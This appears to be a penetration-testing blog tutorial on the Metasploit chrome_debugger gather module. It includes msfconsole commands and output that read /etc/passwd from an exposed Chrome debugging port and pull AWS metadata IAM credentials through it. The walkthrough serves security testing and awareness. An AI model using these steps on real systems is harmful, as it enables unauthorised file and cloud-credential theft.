Using Chrome Debugger Metasploit Gather Module

This last week Nick Starke got the chrome debugger metasploit module pushed over the line and merged into master. I figured I’d write up a quick intro to the module and how it might be used should you happen to stumble across a chrome debugger laying around the network.

Local environment

If you want to startup chrome and test this yourself you can run chrome in a similar fashion.

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --remote-debugging-address=127.0.0.1 --headless

Start msfconsole and use auxilary/gather/chrome_debugger

       =[ metasploit v5.0.64-dev                          ]
+ -- --=[ 1952 exploits - 1092 auxiliary - 335 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use auxiliary/gather/chrome_debugger

show options tells us what we need to set to make this work. The most important being the RHOST of the chrome debugger we’re going to gather from.

msf5 auxiliary(gather/chrome_debugger) > show options

Module options (auxiliary/gather/chrome_debugger):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILEPATH                   no        File to fetch from remote machine.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     9222             yes       The target port (TCP)
   TIMEOUT   10               yes       Time to wait for response
   URL                        no        Url to fetch from remote machine.

We have two paths with this module to abuse with a chrome debugger. First we can read both files and directory listings from the local disk. Second we can query a URL from the network perspective of the chrome debugger system giving us the ability to potentially access or attack local resources that we didn’t have access to before.

Reading a file / directory listing

msf5 auxiliary(gather/chrome_debugger) > set FILEPATH /etc/passwd
FILEPATH => /etc/passwd
msf5 auxiliary(gather/chrome_debugger) > run
[*] Running module against 192.168.12.1

[*] Attempting Connection to ws://192.168.12.1:9222/devtools/page/76FE2B4D88AE3BA2973C801C7A8D1E78
[*] Opened connection
[*] Attempting to load url file:///etc/passwd
[*] Received Data
[*] Sending request for data
[*] Received Data
[+] Stored file:///etc/passwd at /root/.msf4/loot/20191219130327_default_192.168.12.1_chrome.debugger._265252.txt
[*] Auxiliary module execution completed

Abusing proc is useful here too if you aren’t use what directory you are in.

set FILEPATH /proc/self/cwd/

Reading from a remote URL

In this case we’re going to try and access the AWS metadata url, this could be however any internal service.

msf5 auxiliary(gather/chrome_debugger) > set URL http://169.254.169.254/latest/meta-data/iam/security-credentials/
URL => http://169.254.169.254/latest/meta-data/iam/security-credentials/

msf5 auxiliary(gather/chrome_debugger) > run
[*] Running module against 192.168.12.1

[*] Attempting Connection to ws://192.168.12.1:9222/devtools/page/2EE2D41C9D77868E7937831A9534FE05
[*] Opened connection
[*] Attempting to load url http://169.254.169.254/latest/meta-data/iam/security-credentials/
[*] Received Data
[*] Sending request for data
[*] Received Data
[+] Stored http://169.254.169.254/latest/meta-data/iam/security-credentials/ at /root/.msf4/loot/20191219130931_default_192.168.12.1_chrome.debugger._548422.txt
[*] Auxiliary module execution completed